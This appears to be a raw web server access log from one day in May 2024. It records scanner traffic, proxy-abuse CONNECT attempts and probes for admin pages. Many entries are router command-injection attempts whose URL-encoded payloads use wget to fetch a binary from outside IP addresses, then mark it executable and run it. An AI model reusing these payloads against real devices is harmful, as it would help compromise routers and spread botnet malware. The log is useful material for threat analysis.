87.121.69.25 - - [13/May/2024:00:09:54 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.236.176.73 - - [13/May/2024:00:28:52 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [13/May/2024:01:03:51 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.75 - - [13/May/2024:01:22:35 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [13/May/2024:01:34:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [13/May/2024:01:39:49 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [13/May/2024:01:39:49 +0200] "-" 400 1930 45.128.232.152 - - [13/May/2024:01:39:49 +0200] "-" 400 1930 45.128.232.152 - - [13/May/2024:01:39:49 +0200] "-" 400 1930 159.89.239.252 - - [13/May/2024:01:42:28 +0200] "GET / HTTP/1.1" 200 1895 139.59.211.160 - - [13/May/2024:01:46:15 +0200] "GET / HTTP/1.1" 200 1895 139.59.211.160 - - [13/May/2024:01:46:15 +0200] "GET /favicon.ico HTTP/1.1" 404 729 195.1.144.109 - - [13/May/2024:01:48:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 88.30.2.33 - - [13/May/2024:01:51:30 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 198.235.24.83 - - [13/May/2024:02:01:26 +0200] "GET / HTTP/1.0" 200 1895 157.119.249.159 - - [13/May/2024:02:11:31 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.122.204.179 - - [13/May/2024:02:18:29 +0200] "-" 400 1930 183.81.169.139 - - [13/May/2024:03:09:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 206.168.32.3 - - [13/May/2024:03:27:17 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:03:27:20 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:03:27:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.11.15 - - [13/May/2024:03:35:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [13/May/2024:03:47:50 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 78.108.177.54 - - [13/May/2024:03:52:07 +0200] "GET / HTTP/1.0" 200 1895 80.75.212.75 - - [13/May/2024:04:11:52 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 167.94.138.125 - - [13/May/2024:04:22:34 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.125 - - [13/May/2024:04:22:38 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.125 - - [13/May/2024:04:22:38 +0200] "GET /favicon.ico HTTP/1.1" 404 729 162.243.144.27 - - [13/May/2024:05:00:51 +0200] "GET /hudson HTTP/1.1" 404 724 205.210.31.207 - - [13/May/2024:05:21:10 +0200] "GET / HTTP/1.1" 200 1895 118.193.59.4 - - [13/May/2024:05:42:43 +0200] "GET / HTTP/1.1" 200 1895 118.193.59.4 - - [13/May/2024:05:42:43 +0200] "-" 400 1930 152.32.128.85 - - [13/May/2024:05:48:31 +0200] "GET / HTTP/1.1" 200 1895 152.32.128.85 - - [13/May/2024:05:48:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.128.85 - - [13/May/2024:05:48:32 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.128.85 - - [13/May/2024:05:48:32 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 152.32.128.85 - - [13/May/2024:05:48:33 +0200] "GET /axis2-admin/ HTTP/1.1" 404 734 152.32.128.85 - - [13/May/2024:05:48:33 +0200] "GET /axis2/ HTTP/1.1" 404 728 152.32.128.85 - - [13/May/2024:05:48:34 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 744 152.32.128.85 - - [13/May/2024:05:48:34 +0200] "GET null HTTP/1.1" 400 1994 152.32.128.85 - - [13/May/2024:05:48:35 +0200] "GET /struts/webconsole.html HTTP/1.1" 404 744 152.32.128.85 - - [13/May/2024:05:48:36 +0200] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 152.32.128.85 - - [13/May/2024:05:48:36 +0200] "GET /invoker/readonly HTTP/1.1" 404 738 185.100.87.136 - - [13/May/2024:06:05:46 +0200] "-" 400 1930 179.43.188.106 - - [13/May/2024:06:07:33 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [13/May/2024:06:53:24 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.25 - - [13/May/2024:08:06:52 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 141.98.11.15 - - [13/May/2024:08:20:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.22 - - [13/May/2024:08:35:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.8.185%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 756 183.81.169.139 - - [13/May/2024:08:36:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+rm+-rf+telnetdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 74.82.47.45 - - [13/May/2024:08:59:50 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.53 - - [13/May/2024:09:00:28 +0200] "GET /favicon.ico HTTP/1.1" 404 729 74.82.47.53 - - [13/May/2024:09:00:59 +0200] "GET /?format=json HTTP/1.1" 200 1895 74.82.47.25 - - [13/May/2024:09:01:25 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 195.1.144.109 - - [13/May/2024:09:03:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 80.75.212.75 - - [13/May/2024:09:21:24 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 179.43.188.106 - - [13/May/2024:09:36:03 +0200] "GET / HTTP/1.1" 200 1895 192.241.208.64 - - [13/May/2024:09:46:55 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.107 - - [13/May/2024:09:49:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.197.94 - - [13/May/2024:10:27:03 +0200] "-" 400 1930 165.154.164.112 - - [13/May/2024:10:28:59 +0200] "-" 400 1930 165.154.164.112 - - [13/May/2024:10:29:09 +0200] "GET / HTTP/1.1" 200 1895 165.154.164.112 - - [13/May/2024:10:29:27 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.164.112 - - [13/May/2024:10:29:27 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.164.112 - - [13/May/2024:10:29:27 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 121.151.243.113 - - [13/May/2024:10:48:28 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 183.81.169.139 - - [13/May/2024:11:00:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+rm+-rf+telnetdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.25 - - [13/May/2024:11:33:27 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.75 - - [13/May/2024:11:59:03 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.142.182.70 - - [13/May/2024:12:00:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 35.203.210.13 - - [13/May/2024:12:03:34 +0200] "-" 400 1930 35.203.210.13 - - [13/May/2024:12:03:34 +0200] "-" 400 1930 91.92.245.67 - - [13/May/2024:12:52:31 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [13/May/2024:12:53:24 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 195.1.144.107 - - [13/May/2024:13:53:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.11.15 - - [13/May/2024:14:15:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 167.248.133.38 - - [13/May/2024:14:22:34 +0200] "GET / HTTP/1.1" 200 1895 167.248.133.38 - - [13/May/2024:14:22:38 +0200] "GET / HTTP/1.1" 200 1895 167.248.133.38 - - [13/May/2024:14:22:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729 183.81.169.139 - - [13/May/2024:14:34:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 183.81.169.139 - - [13/May/2024:14:34:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 80.75.212.75 - - [13/May/2024:14:37:03 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [13/May/2024:14:39:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:14:39:50 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:14:39:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 194.165.16.72 - - [13/May/2024:15:10:24 +0200] "-" 400 1930 164.155.204.78 - - [13/May/2024:15:16:02 +0200] "GET /manager/html HTTP/1.1" 401 2499 36.156.22.4 - - [13/May/2024:16:27:34 +0200] "-" 400 1930 36.156.22.4 - - [13/May/2024:16:27:35 +0200] "GET / HTTP/1.1" 200 1895 36.156.22.4 - - [13/May/2024:16:27:35 +0200] "-" 400 1930 36.156.22.4 - - [13/May/2024:16:27:36 +0200] "-" 400 1930 36.156.22.4 - - [13/May/2024:16:27:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 36.156.22.4 - - [13/May/2024:16:27:36 +0200] "GET /robots.txt HTTP/1.1" 404 728 36.156.22.4 - - [13/May/2024:16:27:37 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 746 87.121.69.25 - - [13/May/2024:16:48:23 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.75 - - [13/May/2024:16:59:03 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [13/May/2024:17:00:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [13/May/2024:17:46:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 183.81.169.139 - - [13/May/2024:17:46:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 179.43.188.106 - - [13/May/2024:17:47:01 +0200] "GET / HTTP/1.1" 200 1895 185.16.38.111 - - [13/May/2024:18:00:20 +0200] "GET / HTTP/1.1" 200 1895 162.243.131.27 - - [13/May/2024:18:08:36 +0200] "-" 400 1930 192.241.201.85 - - [13/May/2024:18:13:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499 183.61.189.152 - - [13/May/2024:18:57:51 +0200] "GET /manager/html HTTP/1.1" 401 2499 138.68.99.83 - - [13/May/2024:19:12:44 +0200] "-" 400 1930 138.68.99.83 - - [13/May/2024:19:12:44 +0200] "-" 400 1930 138.68.99.83 - - [13/May/2024:19:12:44 +0200] "-" 400 1930 195.1.144.109 - - [13/May/2024:19:12:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 80.75.212.75 - - [13/May/2024:19:32:52 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [13/May/2024:19:36:33 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:19:36:36 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [13/May/2024:19:36:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.25 - - [13/May/2024:19:41:52 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 45.142.182.70 - - [13/May/2024:20:00:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 35.203.210.4 - - [13/May/2024:20:18:25 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.107 - - [13/May/2024:20:30:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 89.190.156.248 - - [13/May/2024:20:48:47 +0200] "POST /cgi-bin/nas_sharing.cgi HTTP/1.0" 404 745 183.81.169.139 - - [13/May/2024:20:56:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 183.81.169.139 - - [13/May/2024:20:56:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [13/May/2024:21:59:57 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 91.92.245.67 - - [13/May/2024:22:08:03 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.79.161.131 - - [13/May/2024:22:14:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 78.108.177.52 - - [13/May/2024:22:45:43 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.52 - - [13/May/2024:22:46:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 71.6.232.20 - - [13/May/2024:22:59:30 +0200] "GET / HTTP/1.1" 200 1895 209.141.40.117 - - [13/May/2024:23:02:43 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [13/May/2024:23:23:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.30.211 - - [13/May/2024:23:25:15 +0200] "GET /manager/html HTTP/1.1" 401 2499 183.81.169.139 - - [13/May/2024:23:28:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 183.81.169.139 - - [13/May/2024:23:28:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756